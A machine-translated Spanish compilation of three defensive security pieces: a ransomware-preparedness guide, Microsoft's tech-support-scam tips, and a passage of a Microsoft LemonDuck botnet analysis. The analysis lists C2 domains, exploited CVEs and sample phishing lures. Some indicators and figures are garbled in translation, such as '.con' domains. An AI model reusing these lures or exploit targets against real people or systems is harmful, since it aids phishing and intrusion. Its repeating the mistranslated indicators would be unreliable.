‎Cómo prepararse para los ataques de ransomware‎

‎Los ataques de ransomware continúan aumentando, utilizando técnicas que son cada vez más sofisticadas y dirigidas. Los líderes de seguridad y gestión de riesgos deben mirar más allá de los puntos finales para ayudar a proteger a la organización del ransomware.‎

‎Visión general‎

‎Desafíos clave‎

  • ‎El protocolo de escritorio remoto, traiga su propia PC y la red privada virtual v‎‎ulnerabilities y misconfiguratio‎‎n se están convirtiendo en el punto de entrada más común para los atacantes.‎‎ ‎‎Esto se ha visto agravado por el crecimiento del trabajo remoto como resultado de la pandemia.‎
  • ‎El ransomware está siendo operado cada vez más por humanos, en lugar de ser entregado como spam por los recursos tecnológicos.‎
  • ‎El costo de la recuperación y el tiempo de inactividad resultante después de un ataque de ransomware, así como el daño a la reputación, pueden ser de 10 a 15 veces más que el rescate.‎

‎Recomendaciones‎

‎Los ‎‎ ‎‎líderes de seguridad y gestión de riesgos responsables de la seguridad de los endpoints y las redes deben centrarse en las tres etapas de un ataque de ransomware:‎

  • ‎Prepárese para los ataques de ransomware mediante la‎‎construcción de una ‎‎ ‎‎estrategia‎‎de‎‎ preparación ‎‎ ‎‎previa‎‎ ‎‎al incidente, que incluye la copia de seguridad, la gestión de activos y la restricción de ‎‎los ‎‎privilegios‎‎de‎‎usuario. Determine‎‎ ‎‎ ‎‎ ‎‎si la organización está‎‎utimamente ‎‎preparada ‎‎para ‎‎pagar un rescate o ‎‎no.‎
  • ‎Implemente medidas de detección‎‎ ‎‎ mediante la implementación de tecnologías de detección basadas en anomalías de comportamiento para identificar ataques de ransomware.‎
  • ‎Cree ‎‎procedimientos de respuesta ‎‎posteriores a la‎‎ ‎‎ identificación capacitando al personal y ‎‎ ‎‎programando‎‎ ‎‎ ‎‎ ‎‎simulacros regulares.‎

‎Introducción‎

‎El ransomware sigue representando un riesgo significativo para las organizaciones. Los ataques recientes han evolucionado desde los ataques de autopropagación, como Wannacry y‎‎ ‎‎ NotPetya,‎‎hasta ejemplos más ‎‎dirigidos,‎‎1,2‎‎ que atacan‎‎a ‎‎una organización, en lugar de ‎‎puntos finales‎‎ individuales. ‎‎ El impacto que estos ataques tienen en las organizaciones ha aumentado hasta el punto de que algunas organizaciones han quebrado,‎‎3‎‎ ‎‎ y, en el caso de la sanidad, ‎‎se han puesto en riesgo ‎‎vidas.‎‎ ‎‎4 Los‎‎ ‎‎ líderes de seguridad y gestión de riesgos (SRM) deben adaptarse a estos cambios y mirar más allá de los controles de seguridad de endpoints para protegerse contra el ransomware.‎‎Las campañas recientes de ransomware, como REvil y Ryuk, se han convertido en “ransomware‎‎operado por‎‎ humanos”, donde el ataque está bajo‎‎ el ‎‎control de ‎‎un operador,‎‎ ‎‎ ‎‎en lugar ‎‎de ‎‎ ‎‎propagarse automáticamente. Tales ataques a menudo se aprovechan de debilidades de seguridad bien conocidas para obtener acceso. Por ejemplo, se cree que una serie de incidentes recientes de ransomware han comenzado con configuraciones de protocolo de escritorio remoto (RDP) mal configuradas o vulnerables. Las credenciales previamente comprometidas también se utilizan para obtener acceso a las cuentas.‎‎Una vez dentro, el atacante se moverá por la red, identificará los datos valiosos y evaluará los controles de seguridad utilizados, a menudo deshabilitando las herramientas ‎‎de protección de endpoints y ‎‎eliminando ‎‎las copias‎‎de‎‎ ‎‎seguridad.‎‎ Luego, cuando los datos han sido identificados, pueden ser cargados y luego utilizados para la extorsión (Doxing), o el ransomware se lanzará para cifrar los datos. El tiempo de permanencia típico entre la primera evidencia de actividad maliciosa y el despliegue de ransomware es de tres días.‎‎ ‎‎5‎‎ ‎‎ El objetivo es maximizar la probabilidad de que se pague el rescate, a menudo incluyendo amenazas de hacer públicos los datos si el rescate no se paga rápidamente.‎‎La protección de las organizaciones contra estos ataques va más allá de la protección de endpoints y abarca muchas herramientas y controles de seguridad diferentes. La Figura 1 describe el ciclo de vida de la defensa del ransomware. Es importante examinar todas estas fases y asumir que un ataque será exitoso y planificar para responder en consecuencia.‎‎Figura 1: Ciclo de vida de la defensa del ransomware‎

The defense life cycle of ransomware protection: prepare, prevent, detect, remediate and recover

‎Análisis‎

‎Construir‎‎ ‎‎ una ‎‎ ‎‎preparación preincidente‎‎ ‎‎ ‎‎ ‎‎S‎‎trateg‎‎y‎

‎Los líderes de SRM ‎‎ ‎‎deben trabajar con el principio de que un ataque de ransomware tendrá éxito ‎‎y ‎‎asegurarse de que la organización esté preparada para detectar lo antes posible y recuperarse lo más rápido posible.‎‎La primera y más común pregunta es: “¿Debería pagarse el rescate?” En última instancia, esto tiene que ser una decisión comercial. Debe hacerse a nivel de junta, con asesoramiento legal. Las agencias de aplicación de la ley recomiendan no pagar, porque fomenta la actividad delictiva continua. En algunos casos, el pago del rescate podría considerarse ilegal,‎‎6‎‎ ‎‎ porque proporciona fondos para actividades delictivas.‎‎ ‎‎Incluso si se paga el rescate, los archivos cifrados a menudo son irrecuperables.‎‎Sin embargo, si una organización quiere estar lista para pagar, es importante establecer un proceso legal y de gobierno que incluya al CEO, la junta y el personal operativo clave. Configurar una billetera de criptomonedas puede llevar tiempo, por lo que, si el pago es una posibilidad, hacer los preparativos necesarios acelerará el tiempo para recuperarse. (Ver‎‎ ‎‎ ‎‎ ‎‎Cómo prevenir o mitigar los ataques de ransomware que exigen el pago en criptomoneda Blockchain‎‎.)‎‎Un buen proceso y estrategia de copia de seguridad es la principal línea de defensa contra el ransomware.‎‎ ‎‎Asegúrese de que la solución de copia de seguridad sea resistente a los ataques de ransomware y supervise continuamente el estado y la integridad de las‎‎ ‎‎ ‎‎copias de seguridad ‎‎(consulte ‎‎ ‎‎Cuadrante mágico para soluciones de copia de seguridad y recuperación de centros de datos).‎‎ En particular, la mayoría de los proveedores de copias de seguridad proporcionan un mecanismo para crear segundas copias inmutables de copias de seguridad o instantáneas inmutables.‎‎La recuperación va más allá de restaurar los datos. El ransomware bloqueará efectivamente una máquina con la nota de ransomware y restaurar las máquinas a un buen estado conocido puede ser más complejo que restaurar los datos. Tener las herramientas y los procesos en su lugar para restaurar los puntos finales a una imagen dorada puede acelerar el tiempo de recuperación. Algunas organizaciones recurren a dispositivos USB para ubicaciones remotas y en el extranjero. Gartner ocasionalmente ve que los clientes ni siquiera intentan limpiar o restaurar una máquina. En cambio, el evento de ransomware es una razón para actualizar su hardware. Cualquiera que sea el proceso, esto debe simularse regularmente para descubrir deficiencias.‎‎ ‎‎La conciencia de seguridad para los usuarios también es importante.‎‎ ‎‎Constantemente e informa‎‎a‎‎ los usuarios sobre los tipos‎‎ de ataques que se ven con alertas regulares y “boletines” de seguridad para reforzar la educación. Cree un conjunto simple de mensajes de seguridad que se repitan regularmente. ‎‎ ‎‎Un usuario alerta no solo tendrá menos probabilidades de caer en la ingeniería social, sino que puede actuar como una alerta temprana. Asegúrese de que los usuarios estén capacitados regularmente sobre cómo identificar‎‎correos electrónicos‎‎maliciosos, en ‎‎ ‎‎particular. Proporcione un mecanismo fácil para informar correos electrónicos sospechosos y refuerce con la confirmación de que el usuario ha hecho lo correcto.‎‎ ‎‎Considere las herramientas de automatización y respuesta de orquestación de seguridad centradas en el correo electrónico (SOAR), como M-SOAR, para automatizar y mejorar la respuesta a los ataques por correo electrónico (consulte la ‎‎ ‎‎Guía de mercado para la seguridad del correo electrónico).‎‎La higiene de la seguridad es fundamental para protegerse contra el ransomware “operado por humanos”, y se requiere una visión holística de toda la organización. Los líderes de SRM deben incluir lo siguiente como parte de su estrategia para protegerse contra el ransomware:‎

  • ‎Construya un proceso confiable de gestión de activos para identificar qué necesita ser protegido y quién es responsable. Se debe prestar especial atención a los sistemas‎‎ ‎‎ ‎‎ ‎‎heredados (consulte ‎‎el ‎‎Cuadrante Mágico para el software de gestión de activos‎‎empresariales).‎
  • ‎Implemente un proceso de gestión de vulnerabilidades basado en el riesgo que incluya inteligencia de amenazas (TI). El ransomware a menudo se basa en sistemas sin parches para permitir el movimiento lateral. Este debe ser un proceso continuo. El riesgo asociado con las vulnerabilidades cambia a medida que los atacantes explotan las vulnerabilidades (consulte ‎‎ ‎‎Los elementos esenciales de la gestión eficaz de vulnerabilidades).‎
  • ‎Elimine los privilegios administrativos locales de los usuarios en los puntos finales y limite el acceso a las aplicaciones empresariales más confidenciales, incluido el correo electrónico, para evitar que la cuenta se vea comprometida (consulte ‎‎ ‎‎Cuadrante mágico para la administración del acceso privilegiado).‎
  • ‎Implemente el‎‎escaneo de c‎‎ompliance ‎‎ ‎‎para sistemas mal configurados y no conformes, así como pruebas de penetración y herramientas de simulación de ataques de violación (BAS). ‎‎ ‎
  • ‎Implemente ‎‎ ‎‎una ‎‎ ‎‎autenticación segura para usuarios con privilegios, como administradores de bases de datos e infraestructura, y cuentas de servicio. Registre la actividad. Los malos actores a menudo usarán malware conocido y detectado para obtener acceso a credenciales de cuenta con privilegios más altos.‎

‎Los ataques de ransomware suelen seguir el patrón de ataque que se muestra en la Figura 2.‎‎Figura 2: Anatomía de un ataque de ransomware‎

Anatomy of a ransomware attack

‎Los líderes de SRM deben alinear sus estrategias de seguridad con los patrones y técnicas utilizados por los atacantes. El marco MITRE ATT‎‎&‎‎CK se puede utilizar para evaluar y calificar la protección de una organización contra cada ‎‎ ‎‎fase.‎‎ ‎‎MITRE también proporciona‎‎ ‎‎ ‎‎ ‎‎SHIELD,‎‎que es una base de conocimiento de defensa activa que asigna técnicas de ataque a técnicas de‎‎ defensa, así como un repositorio de TI cibernética ‎‎que‎‎ enumera las técnicas y tácticas ‎‎posteriores‎‎ al compromiso‎‎ utilizadas.‎‎ ‎‎El ataque comienza con la entrada, es decir, el punto inicial de ataque. Esto a menudo toma la forma de un sitio web comprometido entregado a través de un phishing o ataque dirigido. Las puertas de enlace de correo electrónico seguras (SEG) y las puertas de enlace web seguras (SWG) pueden ayudar a proporcionar protección. Tecnologías como el aislamiento web también pueden limitar el impacto. Como se discutió anteriormente, otro método común de ataque es a través de puertos RDP vulnerables. Las pruebas de penetración pueden ser efectivas para encontrar agujeros en las defensas.‎‎Una vez comprometidas, las plataformas de protección de endpoints (EPP), la detección y respuesta de endpoints‎‎(EDR)‎‎y las soluciones de defensa contra amenazas móviles (MTD) deben usarse como parte de la defensa.‎‎ ‎‎Si los equipos internos no tienen el conjunto de habilidades o el ancho de banda necesarios, complemente EDR con servicios administrados (consulte ‎‎ ‎‎la Guía del mercado para servicios administrados de detección y respuesta).‎‎ Las herramientas EDR están diseñadas para detectar la actividad de cifrado y evitar que continúe.‎‎Las máquinas comprometidas reciben instrucciones a través de canales de comando y control. La seguridad dns, los SLB y otras soluciones de detección y respuesta de red (NDR) pueden detectar y bloquear estos canales. Se produce un mayor movimiento de túnel o lateral a medida que el atacante intenta moverse por la organización. Los firewalls de endpoints y la segmentación de redes, así como la fuerte gestión de vulnerabilidades y parches, limitan lo que el atacante es capaz de lograr.‎

‎Implementar medidas de detección para identificar ataques de ransomware‎

‎Inevitablemente, el ransomware puede superar sus defensas y las protecciones puestas en su lugar. Entonces se convierte en una cuestión de qué tan rápido puede detectar el incidente. Muchas de las herramientas descritas para la protección también proporcionarán los datos y la telemetría para la detección. En particular, las herramientas EDR recopilan indicadores de compromiso (IOC) y eventos que pueden no ser suficientes para identificar y prevenir específicamente un ataque, pero pueden mostrar que “puede” haber un ataque en curso. ‎‎ ‎‎EDR también puede ayudar a identificar “madrigueras”, donde el ataque permanece en silencio, mientras se recopilan más cuentas y privilegios comprometidos.‎‎La investigación,‎‎interpretación e investigación de estos‎‎ ‎‎ ‎‎eventos y eventos‎‎del ‎‎ ‎‎COI‎‎ ‎‎tienden a requerir un mayor nivel de experiencia. Cada vez más, esto se compra como parte de una solución EDR o como una solución MDR o administrada más amplia. El uso de estos servicios puede ser beneficioso para las organizaciones sin el personal o los conjuntos de habilidades para tener sus propios centros de operaciones de seguridad (SOC).‎‎Otras herramientas de seguridad también entran en juego durante la fase de detección. Los sistemas de prevención de intrusiones (IPS), así como las soluciones de NDR y análisis de tráfico de red (NTA), pueden ayudar a proporcionar una detección temprana (consulte ‎‎ ‎‎la Guía del mercado para detección y respuesta de red).‎‎ Las herramientas de engaño también pueden ser efectivas. Esto puede ser tan simple como configurar cuentas falsas de “administración” que nunca se usan realmente, de modo que, si se intenta usarla, se pueda enviar una alerta.‎‎ ‎‎Otros tipos de señuelos, como plataformas de engaño y honeypots, también se pueden implementar como parte de una estrategia de defensa contra ransomware (consulte‎‎ ‎‎ ‎‎ ‎‎Mejore su función de detección de amenazas con tecnologías de engaño).‎‎Además de los IOC y las alertas provenientes de las herramientas de seguridad, también es importante observar lo que “no está sucediendo”. Si‎‎ ‎‎ la copia de seguridad programa un‎‎cambio o una‎‎parada, el volumen de copia de seguridad o las tasas de cambio aumentan inesperadamente. Las instantáneas deshabilitadas en ciertas máquinas, así como las herramientas de seguridad que ya no se ejecutan en las máquinas, podrían indicar que un atacante está dentro de la organización.‎‎Una vez que se ha detectado un ataque de ransomware,‎‎minimizar el impacto es esencial. La técnica más común utilizada es el aislamiento. Hay una variedad de técnicas de aislamiento, y muchas herramientas EDR proporcionan funcionalidad de aislamiento en el dispositivo para permitir que los respondedores de incidentes aíslen las máquinas del resto de la red, al tiempo que permiten el acceso remoto para la corrección.‎‎El aislamiento basado en la red es más un instrumento contundente y requiere la prohibición de dispositivos sospechosos basados en la dirección MAC a nivel de hardware (de ahí la importancia de la gestión de activos maduros). Esto se aplica a los conmutadores de red locales, las redes privadas virtuales (VPN), el control de acceso a la red (NAC) y los puntos de acceso Wi-Fi de la organización. A menudo, esto se convierte en tirar frenéticamente de los cables de red. Sin embargo, esto puede ralentizar las fases de recuperación, ya que requiere acceso físico a los dispositivos para su corrección.‎‎Muchas organizaciones necesitarán asistencia para ayudar a mitigar y recuperarse de un ataque. Los equipos especializados en respuesta a incidentes pueden desempeñar un papel importante, y tener un retenedor de respuesta a incidentes en su lugar puede reducir el costo y la velocidad de la respuesta ‎‎ ‎‎(consulte ‎‎ ‎‎Cada organización debe evaluar el valor de un retenedor de respuesta a incidentes).‎‎Los pasos de recuperación táctica variarán, dependiendo de la organización y el alcance del ransomware, pero implicarán:‎

  • ‎Recuperación de datos de copias de seguridad, incluida la verificación de la integridad de esas copias de seguridad y la comprensión de qué datos, si los hay, se han perdido.‎
  • ‎Una vez comprometidos, los EPP y EDR, así como las soluciones MTD, deben usarse como parte de la respuesta de remediación para eliminar la amenaza‎‎ y revertir cualquier‎‎ cambio. Como se señaló anteriormente, la recuperación va más allá de la recuperación de los datos; las máquinas infectadas pueden estar “bloqueadas” y pueden requerir acceso físico. Durante la fase de preparación, es importante comprender y planificar cómo se lograría esto.‎
  • ‎Validación de la integridad de un dispositivo antes de que se le permita volver a la red.‎
  • ‎Actualización o eliminación de credenciales comprometidas; sin esto, el atacante podrá volver a ingresar.‎
  • ‎Realice un análisis exhaustivo de la causa raíz de cómo y qué sucedió, incluidos los datos que se han exfiltrado (doxing). El doxing ocurre cuando los malos actores amenazan con divulgar información robada. Esto se está convirtiendo cada vez más en un método secundario de extorsión si una víctima decide no pagar el rescate.‎

‎Los entornos ‎‎de infraestructura como servicio (IaaS)‎‎y plataforma como servicio‎‎(PaaS) son igualmente susceptibles a los ataques de ransomware. Conceptualmente, el‎‎se debe abordar de la misma manera. Lo que cambia son las actividades tácticas que se necesitan ejecutar para aislar los dispositivos / segmentos de red afectados.‎

‎Cree procedimientos ‎‎de respuesta ‎‎posterior‎‎ a‎‎ la identificación mediante la capacitación del personal y la programación de simulacros‎

‎En última instancia, los líderes de SRM deben estar preparados para que un ataque de ransomware tenga éxito y tener planes, procesos y procedimientos en su lugar.‎‎ ‎‎Estos planes deben incluir los aspectos de TI, así como los planes de comunicación tanto con el personal interno como con los socios y proveedores (consulte ‎‎ ‎‎Cómo prepararse y responder a las interrupciones del negocio después de ciberataques agresivos).‎‎ ‎‎Es importante para la ‎‎ ‎‎recuperación‎‎ ‎‎ que los líderes de SRM comuniquen el problema de manera rápida y clara. Proporcione actualizaciones periódicas sobre el estado y cuándo se recuperarán los sistemas hasta el punto en que los sistemas sean utilizables. Varias‎‎ ‎‎ herramientas de simulación de crisis cibernéticas‎‎ ‎‎ pueden ayudar a identificar brechas en procedimientos, roles y responsabilidades.‎‎Estos planes variarán, según el alcance y el éxito de un ataque de ransomware. Puede ser solo una pequeña parte de una organización, y el impacto podría ser mínimo. Para ataques más grandes, el impacto puede ir más allá de la organización para los clientes y socios. Como parte de la preparación, realizar simulacros de incendio regulares o ejercicios de mesa para ensayar una respuesta puede ser ‎‎ ‎‎beneficioso‎‎ ‎‎ (consulte ‎‎ ‎‎Toolkit: Tabletop Exercise for Cyberattack Preparation and Response‎‎).‎‎Una vez que la recuperación esté en progreso, recopile suficiente información para comprender la causa raíz del ataque y comprender qué controles fallaron o no estaban en su lugar. Una vez más, los servicios forenses digitales especializados y los servicios de respuesta a incidentes desempeñan un papel importante en este análisis. Una vez que se recuperan los sistemas, es fundamental implementar las lecciones aprendidas y retroalimentarlas en la fase de preparación.‎

5 consejos de Microsoft para prevenir el fraude cibernético

Image default

5 consejos de Microsoft para prevenir el fraude cibernético

El negocio del fraude cibernético se ha desarrollado de forma masiva en los últimos años, al grado que se calcula que las pérdidas asociadas a este tipo de prácticas representarían un costo aproximado más de $500,000 millones de dólares cada mes, además de las afectaciones que causa a nivel operativo y reputacional, tanto para personas como para organizaciones. De acuerdo con un estudio de Microsoft sobre fraude en línea, las estafas de soporte técnico juegan un rol crítico en este tipo de ataques, donde tres de cada cinco usuarios alrededor del mundo han sido víctimas de este tipo de ataques.

Haciéndose pasar por empleados de Microsoft o representantes de otras compañías tecnológicas, los estafadores emiten falsas notificaciones a los usuarios. Simulando la atención a una supuesta infección de malware o incidente de seguridad. Lo que ha resultado en más de 6,500 quejas al mes reportando fraudes de soporte técnico en todo el mundo. Las cuales han vulnerado a 65% de los mexicanos encuestados.

Estos acercamientos han pasado de llamadas no deseadas a falsos avisos emergentes en la computadora, adaptando sus tácticas para, en el mejor de los casos, convencer a las víctimas que paguen para “solucionar” un problema inexistente con su dispositivo o software. En el peor de los casos, tratan de robar información personal o financiera y, si se les permite conectarse de forma remota a la computadora para realizar esta “reparación”, a menudo instalarán malware, ransomware u otros programas no deseados que pueden extraer información y/o corromper los datos o dispositivos.

Con el fin de prevenir el fraude cibernético

Es importante considerar que Microsoft no se comunica de forma imprevista con sus clientes. Cualquier atención 1:1 debe ser iniciada por el usuario; del mismo modo, la compañía emite las siguientes recomendaciones para poder detectar a tiempo un intento de estafa cibernética:

  • Si se presenta una notificación o mensaje de error con un número telefónico, no se comunique a esa línea. Microsoft no suele incluir ese tipo de información en sus comunicaciones.
  • Descargue solamente software de fuentes oficiales. Es peligroso instalar programas de externos, ya que no cuentan con una verificación de seguridad y pueden ser cpor terceros para insertar archivos maliciosos.
  • De preferencia utilice Microsoft Edge como su navegador default, ya que su interfaz se encuentra habilitada para bloquear sitios fraudulentos y mensajes pop-up gracias a las capacidades de Microsoft Defender SmartScreen.
  • Active la protección antivirus en tiempo real de Windows Security, solución que detecta y elimina los malwares fraudulentos registrados.
  • Recuerde que el personal de soporte técnico de Microsoft nunca solicitará pagos en criptomonedas o tarjetas de regalo.

Sin embargo, no siempre es posible identificar oportunamente un fraude cibernético. En el caso de México, 23% de los encuestados han declarado continuar con la dinámica de fraude tras la interacción inicial. Lo que ha impactado en pérdidas monetarias para 14% de los afectados y picos de estrés para el 68%. Ante estas situaciones, se aconseja desinstalar lo antes posible cualquier tipo de archivo indicado por los atacantes. Hacer un escaneo de seguridad para encontrar y mitigar cualquier tipo de malware presente. Además formatear el sistema y cambiar las contraseñas de las cuentas abiertas en el equipo.

‎Cuando los mineros de monedas evolucionan, Parte 1: Exponiendo LemonDuck y LemonCat, infraestructura moderna de malware de minería‎

‎La lucha contra las amenazas actuales a las empresas y su prevención requieren una protección integral centrada en abordar todo el alcance y el impacto de los ataques. Cualquier cosa que pueda‎‎obtener acceso a las‎‎máquinas, incluso el llamado malware de productos básicos, puede generar amenazas más peligrosas. Hemos visto esto en troyanos bancarios que sirven como punto de entrada para ataques de ransomware y manos en el teclado. LemonDuck, un malware actualizado activamente y robusto que es conocido principalmente por sus objetivos de minería de bots y criptomonedas, siguió la misma trayectoria cuando adoptó un comportamiento más sofisticado y escaló sus operaciones. Hoy en día, más allá de usar recursos para sus actividades tradicionales de bots y minería, LemonDuck roba credenciales, elimina los controles de seguridad, se propaga a través de correos electrónicos, se mueve lateralmente y, en última instancia, deja caer más herramientas para la actividad operada por humanos.‎

black laptop computer beside black framed eyeglasses on brown wooden table

‎La amenaza de LemonDuck a las empresas también está en el hecho de que es una amenaza multiplataforma. Es una de las pocas familias de malware bot documentadas que se dirige a los sistemas Linux, así como a los dispositivos Windows. Utiliza una amplia gama de mecanismos‎‎de difusión: correos electrónicos de phishing, exploits, dispositivos USB, fuerza bruta, entre otros,‎‎y ha demostrado que puede aprovechar rápidamente noticias, eventos o el lanzamiento de nuevos exploits para ejecutar campañas efectivas. Por ejemplo, en 2020, se observó el uso de señuelos con temática COVID-19 en ataques por correo electrónico. En 2021, explotó ‎‎las vulnerabilidades‎‎ de Exchange Server recién parcheadas para obtener acceso a sistemas obsoletos.‎

‎Esta amenaza, sin embargo, no se limita a vulnerabilidades nuevas o populares. Continúa utilizando vulnerabilidades más antiguas, que benefician a los atacantes en momentos en que el enfoque cambia a parchear una vulnerabilidad popular en lugar de investigar el compromiso. En particular, LemonDuck elimina a otros atacantes de un dispositivo comprometido al deshacerse del malware de la competencia y prevenir nuevas infecciones mediante parches de las mismas vulnerabilidades que utilizó para obtener acceso.‎

‎En los primeros años, LemonDuck se dirigió fuertemente a China, pero sus operaciones se han expandido desde entonces para incluir a muchos otros países, centrándose en los sectores de fabricación e IoT. Hoy en día, LemonDuck impacta en un rango geográfico muy grande, con los Estados Unidos, Rusia, China, Alemania, el Reino Unido, India, Corea, Canadá, Francia y Vietnam viendo la mayoría de los encuentros.‎

‎Figura 1. Distribución global de la actividad de la red de bots LemonDuck‎

‎En 2021, las campañas de LemonDuck comenzaron a utilizar una infraestructura y herramientas de comando y control (C2) más diversificadas. Esta actualización apoyó el marcado aumento en las acciones de manos en el teclado después de la violación, que variaba dependiendo del valor percibido de los dispositivos comprometidos para los atacantes. A pesar de todas estas actualizaciones, sin embargo, LemonDuck todavía utiliza C2s, funciones, estructuras de script y nombres de variables durante mucho más tiempo que el malware promedio. Esto es probablemente debido a su uso de proveedores de alojamiento a prueba de balas como Epik Holdings, que es poco probable que tome cualquier parte de la infraestructura lemonduck fuera de línea, incluso cuando se informa de acciones maliciosas, lo que permite LemonDuck persistir y seguir siendo una amenaza.‎

‎La investigación en profundidad de las infraestructuras de malware de varios tamaños y operaciones proporciona información valiosa sobre la amplitud de las amenazas a las que se enfrentan las organizaciones hoy en día. En el caso de LemonDuck, la amenaza es multiplataforma, persistente y en constante evolución. Investigaciones como esta enfatizan la importancia de tener una visibilidad completa de la amplia gama de amenazas, así como la capacidad de correlacionar actividades simples y dispares como la minería de monedas con ataques adversarios más peligrosos.‎

‎Infraestructura de LemonDuck y LemonCat‎

‎La documentación más antigua de LemonDuck fue de sus campañas de criptomonedas en mayo de 2019. Estas campañas incluían scripts de PowerShell que empleaban scripts adicionales iniciados por una tarea programada. La tarea se utilizó para traer la herramienta PCASTLE para lograr un par de objetivos: abusar de la explotación EternalBlue SMB, así como usar la fuerza bruta o pasar el hash para moverse lateralmente y comenzar la operación de nuevo. Muchos de estos comportamientos todavía se observan en las campañas de LemondDuck hoy en día.‎

‎LemonDuck lleva el nombre de la variable “Lemon_Duck” en uno de los scripts de PowerShell mencionados. La variable se utiliza a menudo como agente de usuario, junto con los números asignados, para los dispositivos infectados. El formato usaba dos conjuntos de caracteres alfabéticos separados por guiones, por ejemplo: “User-Agent: Lemon-Duck-[A-Z]-[A-Z]”. El término todavía aparece en los scripts de PowerShell, así como en muchos de los scripts de ejecución, específicamente en una función llamada SIEX, que se usa para asignar un agente de usuario único durante la conexión a botnets en ataques tan recientemente como junio de 2021.‎

‎LemonDuck utiliza con frecuencia material de código abierto construido a partir de recursos también utilizados por otras redes de bots, por lo que hay muchos componentes de esta amenaza que parecen familiares. Los investigadores de Microsoft son conscientes de dos estructuras operativas distintas, que ambos utilizan el malware LemonDuck pero son potencialmente operados por dos entidades diferentes para objetivos separados.‎

‎La primera, que llamamos la infraestructura “Pato”, utiliza infraestructuras históricas discutidas en este informe. Es muy consistente en la ejecución de campañas y realiza actividades de seguimiento limitadas. Esta infraestructura rara vez se ve junto con el compromiso del dispositivo de borde como un método de infección, y es más probable que tenga nombres para mostrar aleatorios para sus sitios C2, y siempre se observa utilizando “Lemon_Duck” explícitamente en el script.‎

‎La segunda infraestructura, a la que‎‎llamamos infraestructura “Cat”, por usar principalmente dos dominios con la palabra “cat” en ellos (‎‎sqlnetcat[.] com‎‎, ‎‎netcatkit[.] com‎‎)—‎‎surgió en enero de 2021. Se utilizó en ataques explotando vulnerabilidades en Microsoft Exchange Server. Hoy en día, la infraestructura Cat se utiliza en ataques que normalmente resultan en la instalación de puerta trasera, el robo de credenciales y datos, y la entrega de malware. A menudo se ve la entrega del malware Ramnit.‎

‎Ejemplos de dominios Duck‎‎Dominios Cat de ejemplo‎
‎cdnimages[.] Xyz‎‎bb3u9[.] con‎‎zz3r0[.] con‎‎pp6r1[.] con‎‎amynx[.] con‎‎ackng[.] con‎‎hwqloan[.] con‎‎js88[.] en‎‎zer9g[.] con‎‎b69kq[.] con‎‎sqlnetcat[.] con‎‎netcatkit[.] con‎‎abajo[.] sqlnetcat[.] COM‎ 

‎Las infraestructuras Duck y Cat usan subdominios similares y usan los mismos nombres de tarea, como “blackball”. Ambas infraestructuras también utilizan los mismos componentes empaquetados alojados en sitios similares o idénticos para sus scripts de minería, movimiento lateral y eliminación de competencia, así como muchas de las mismas llamadas de función.‎

‎El hecho de que la infraestructura cat se utiliza para campañas más peligrosas no despriorizar las infecciones de malware de la infraestructura duck. En cambio, esta inteligencia agrega un contexto importante para comprender esta amenaza: el mismo conjunto de herramientas, acceso y métodos se puede volver a utilizar a intervalos dinámicos, con un mayor impacto. A pesar de las implicaciones comunes de que los mineros criptomoneda son menos amenazantes que otros programas maliciosos, su funcionalidad principal refleja el software no monetizado, por lo que cualquier infección botnet digno de priorización.‎

‎Figura 2. Cadena de ataque LemonDuck de las infraestructuras Duck y Cat‎

‎Acceso inicial‎

‎LemonDuck se propaga en una variedad de formas, pero los dos métodos principales son (1) compromisos que son iniciados por el borde o facilitados por implantes de bot que se mueven lateralmente dentro de una organización, o (2) campañas de correo electrónico iniciadas por bots.‎

‎LemonDuck actúa como un cargador para muchas otras actividades de seguimiento, pero una si sus funciones principales es propagarse comprometiendo otros sistemas. Desde su primera aparición, los operadores de LemonDuck han aprovechado los análisis contra dispositivos Windows y Linux para SMB, Exchange, SQL, Hadoop, REDIS, RDP u otros dispositivos perimetrales abiertos o débilmente autenticados que podrían ser vulnerables al rociado de contraseñas o vulnerabilidades de aplicaciones como CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon) y CVE-2021-27065 (ProxyLogon).‎

‎Una vez dentro de un sistema con un buzón de Outlook, como parte de su comportamiento de explotación normal, LemonDuck intenta ejecutar un script que utiliza las credenciales presentes en el dispositivo. El script indica al buzón que envíe copias de un mensaje de suplantación de identidad (phishing) con mensajes y datos adjuntos preestablecidos a todos los contactos.‎

‎Debido a este método de mensajería de contacto, no se aplican los controles de seguridad que se basan en determinar si un correo electrónico se envía desde un remitente sospechoso. Esto significa que las políticas de seguridad de correo electrónico que reducen el escaneo o la cobertura del correo interno deben volver a evaluarse, ya que el envío de correos electrónicos a través del raspado de contactos es muy efectivo para evitar los controles de correo electrónico.‎

‎Desde mediados de 2020 hasta marzo de 2021, los temas de correo electrónico y el contenido del cuerpo de LemonDuck se han mantenido estáticos, al igual que los nombres y formatos de los archivos adjuntos. Estos nombres y formatos de archivos adjuntos han cambiado muy poco con respecto a campañas similares que ocurrieron a principios de 2020.‎

‎Asuntos de correo electrónico de ejemplo ‎‎Ejemplo de contenido del cuerpo del correo electrónico‎
‎La verdad del COVID-19‎‎COVID-19 nCov Información especial OMS‎‎AVISO DE HALTH:CORONAVIRUS‎‎Wtf‎‎Lo que el fcuk‎‎Adiós‎‎carta de despedida‎‎archivo roto‎‎¿Esta es su orden?‎‎El virus en realidad proviene de los Estados Unidos de América‎‎información muy importante para el Covid-19‎‎consulte el documento adjunto para su acción y discreción.‎‎el brote de CORONAVIRUS es motivo de preocupación, especialmente cuando el personal de forign ha llegado recientemente o llegará a varios intt en un futuro próximo.‎‎¿qué te pasa?¿estás fuera de tu mente!!!!!‎‎¿estás fuera de tu mente!!!!! ¿qué te pasa?‎‎ad ad siéndolo, mantente en contacto‎‎me puedes ayudar a arreglar el archivo,no puedo leerlo‎‎el archivo está roto, no puedo abrirlo‎

‎El archivo adjunto utilizado para estos señuelos es uno de tres tipos: .doc, .js o un .zip que contiene un archivo de .js. Sea cual sea el tipo, el archivo se denomina “Léame”. En ocasiones, los tres tipos están presentes en el mismo correo electrónico.‎

‎Figura 3. Correo electrónico de ejemplo‎

‎Aunque muchos proveedores de seguridad detectan javascript, es posible que se clasifique con nombres de detección genéricos. Podría ser valioso para las organizaciones desinfectar JavaScript o VBScript ejecutando o llamando a mensajes (como PowerShell) directamente desde descargas de correo a través de soluciones como ‎‎reglas de detección personalizadas.‎

